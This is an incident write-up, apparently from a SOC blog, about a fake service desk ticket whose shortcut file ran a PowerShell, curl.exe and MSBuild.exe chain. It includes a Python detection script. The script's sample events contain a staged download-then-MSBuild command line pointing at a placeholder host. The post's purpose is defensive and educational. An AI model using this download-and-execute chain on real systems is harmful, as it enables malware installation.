
How a fake service desk ticket nearly opened the door to a full-scale breach

The Zip File That Almost Broke In

A quiet alert flickered across the SOC dashboard early one morning. It didn't scream for attention: no mass detections, no large data transfers, just a single suspicious process. Yet something about it didn't fit the pattern. One of our Level 1 analysts trusted his instincts, and that small decision stopped a complex, multi-stage malware attack before it could take hold.

What began as a simple service desk ticket turned out to be a cleverly disguised intrusion attempt, one that could have led to a full compromise of the organisation’s environment. 


The Setup: A Simple Mistake with Serious Consequences 

It started when a user received a service desk ticket claiming that someone couldn’t access a particular website. Believing it was legitimate, the user downloaded a ZIP file attached to the ticket and opened it. Inside was a single shortcut file (.lnk). 

Without hesitation, the user double-clicked it. 

What they didn't realise was that the shortcut was not what it appeared to be. Its target was a command line that launched PowerShell, Microsoft's legitimate scripting tool, and that command line triggered a chain of downloads and executions designed to install malicious files. Nothing was exploited; the shortcut simply ran the commands it had been built to run, under the user's own account.

This single click could have opened a door for a threat actor to establish control over the machine and, potentially, the wider network.


The Technical Breakdown: Living off the Land

The SOC investigation revealed that the .lnk file was crafted to launch PowerShell, which in turn called curl.exe, a legitimate command-line utility for transferring data that has shipped with Windows since Windows 10 version 1803. The commands attempted to:

  • Download malicious content from compromised external websites, saving the files in system folders such as ProgramData rather than in the user's profile, where a casual look would be less likely to find them.
  • Invoke MSBuild.exe, the Microsoft build engine that ships with the .NET Framework, to "build" an XML project file whose real purpose was to execute code embedded inside it.
  • Run obfuscated scripts that gathered system information and attempted to download further payloads from obscure web sources, even disguising them as ordinary content hosted on legitimate user profile pages.

This technique is known as "Living off the Land": using trusted, built-in system tools (known as LoLBins, or Living-off-the-Land Binaries) to conduct malicious activity. Because the binaries themselves are signed Microsoft components, signature-based antivirus and application allow-lists rarely flag them; the malicious part lives entirely in the arguments passed to them and in the files they fetch, which is easy to miss for untrained eyes.

In this case, the attacker's objective was most likely to establish a Command and Control (C2) channel, giving them remote access to the infected system. From there, they could move laterally across the network, deploy ransomware, or exfiltrate sensitive data.

Fortunately, the organisation’s Endpoint Detection and Response (EDR) system detected and blocked the activity before the malware could execute fully. Quick isolation of the affected machine prevented the attack from spreading further. 


The Lesson: When Curiosity Meets Convenience 

The user had no malicious intent, just a moment of misplaced trust. They assumed the ticket and the file were part of normal work. But this incident demonstrates how modern attacks often rely not on technical vulnerabilities but on human behaviour: no software flaw was needed, only a user willing to open a shortcut.

Fake service desk tickets, falsified alerts, and realistic corporate messages are increasingly common social engineering tactics. Attackers know that IT and service teams deal with attachments and support requests daily, making them ideal targets. 

To prevent similar incidents, organisations should:

  • Implement mandatory phishing and social engineering training, tailored for service desk and IT support roles, and include fake tickets and support requests in simulations, not just e-mail.
  • Treat attachments and URLs inside internal ticketing systems as untrusted input: scan them on upload, and verify unexpected requests with the requester through a second channel before opening anything.
  • Restrict PowerShell, Windows Script Host (wscript.exe and cscript.exe) and MSBuild.exe on machines with no business need for them, for example with AppLocker or Windows Defender Application Control rules, and enforce PowerShell Constrained Language Mode where PowerShell cannot be removed entirely.
  • Monitor and alert on downloads initiated by command-line tools such as curl.exe, certutil.exe and bitsadmin.exe, especially when they are spawned by a script host and write into ProgramData or Temp directories.
  • Conduct regular EDR policy reviews to ensure new evasion techniques, including fresh LoLBin combinations, are detected rather than only the binaries already on a block list.
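The chain described in the technical breakdown (PowerShell spawning curl.exe to drop a file into ProgramData, then MSBuild.exe executing that file) maps directly onto the monitoring recommendation above. The following is an added example of that detection logic, not the SOC's own rule content or any EDR vendor's signature. It assumes Sysmon-style process-creation events (Event ID 1) already parsed into dictionaries with the field names used below; the sample events, process GUIDs and hostnames are constructed for the demonstration and are not real telemetry.

```python
"""Detect the LoLBin chain: script host -> curl.exe download into a staging dir -> MSBuild.exe.

Added example for this article; not the SOC's detection content.
Assumes Sysmon-style process-creation events (Event ID 1) parsed into dicts.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Script hosts that a malicious .lnk commonly launches first.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Built-in Windows tools abused to fetch payloads (LoLBins).
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# Directories where an interactive user process has no normal reason to drop payloads or project files.
STAGING_DIRS = re.compile(r"(?i)\\(ProgramData|Users\\[^\\]+\\AppData\\Local\\Temp|Windows\\Temp)\\")
URL_RE = re.compile(r"(?i)https?://[^\s\"']+")


def image_name(path: str) -> str:
    """Lower-cased file name of a full image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_lolbin_download(ev: dict) -> bool:
    """curl/certutil/bitsadmin spawned by a script host, fetching a URL into a staging directory."""
    return (image_name(ev["Image"]) in DOWNLOADERS
            and image_name(ev["ParentImage"]) in SCRIPT_HOSTS
            and URL_RE.search(ev["CommandLine"]) is not None
            and STAGING_DIRS.search(ev["CommandLine"]) is not None)


def is_suspicious_msbuild(ev: dict) -> bool:
    """MSBuild.exe handed a project file from a staging directory instead of a developer workspace."""
    return (image_name(ev["Image"]) == "msbuild.exe"
            and STAGING_DIRS.search(ev["CommandLine"]) is not None)


def detect_lotl_chain(events, window=timedelta(minutes=10)):
    """Return (severity, rule, pid) tuples. A single hit is 'medium'; a download followed by
    MSBuild under the same parent process (ParentProcessGuid) within `window` is escalated to 'high'."""
    alerts = []
    downloads_by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        t = datetime.fromisoformat(ev["UtcTime"])
        if is_lolbin_download(ev):
            downloads_by_parent[ev["ParentProcessGuid"]].append(t)
            alerts.append(("medium", "lolbin_download", ev["ProcessId"]))
        elif is_suspicious_msbuild(ev):
            prior = downloads_by_parent.get(ev["ParentProcessGuid"], [])
            if any(t - d <= window for d in prior):
                alerts.append(("high", "download_then_msbuild_chain", ev["ProcessId"]))
            else:
                alerts.append(("medium", "msbuild_from_staging_dir", ev["ProcessId"]))
    return alerts


# Constructed sample events (not real telemetry): the attack chain plus two benign lookalikes.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"UtcTime": "2024-05-01T06:12:03", "ProcessId": 4120, "ProcessGuid": "{P1}", "ParentProcessGuid": "{E0}",
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -c <constructed placeholder launcher>"},
    {"UtcTime": "2024-05-01T06:12:05", "ProcessId": 4188, "ProcessGuid": "{P2}", "ParentProcessGuid": "{P1}",
     "Image": r"C:\Windows\System32\curl.exe", "ParentImage": PS,
     "CommandLine": r"curl.exe -s -o C:\ProgramData\update.xml https://example.invalid/u/update.xml"},
    {"UtcTime": "2024-05-01T06:12:09", "ProcessId": 4210, "ProcessGuid": "{P3}", "ParentProcessGuid": "{P1}",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "ParentImage": PS,
     "CommandLine": r"MSBuild.exe C:\ProgramData\update.xml"},
    # Benign: a developer building a project in their workspace from Visual Studio.
    {"UtcTime": "2024-05-01T09:30:00", "ProcessId": 7001, "ProcessGuid": "{D1}", "ParentProcessGuid": "{VS}",
     "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    # Benign: an admin script fetching a document into the user's home directory.
    {"UtcTime": "2024-05-01T09:45:00", "ProcessId": 7100, "ProcessGuid": "{A1}", "ParentProcessGuid": "{A0}",
     "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -o C:\Users\alice\report.pdf https://intranet.example/report.pdf"},
]

if __name__ == "__main__":
    for alert in detect_lotl_chain(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed sample, the logic raises a medium alert for the curl.exe download and escalates the MSBuild.exe execution to high because both share the PowerShell parent within the window, while the developer's MSBuild build and the admin's curl download produce nothing. The correlation on ParentProcessGuid is what separates "a LoLBin was used" from "a LoLBin chain is underway"; tune the staging-directory pattern and the time window to your own environment before deploying it.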


Conclusion: A Quiet Win and a Critical Reminder

This case is a powerful example of why constant vigilance in the SOC matters, and how one click can make or break an organisation’s security. Thanks to a sharp analyst, strong EDR configuration, and fast response procedures, the threat never progressed beyond the first stage. 

The story ends quietly this time. But it’s a reminder that behind every alert, no matter how small, could be the start of something far bigger, and far more dangerous.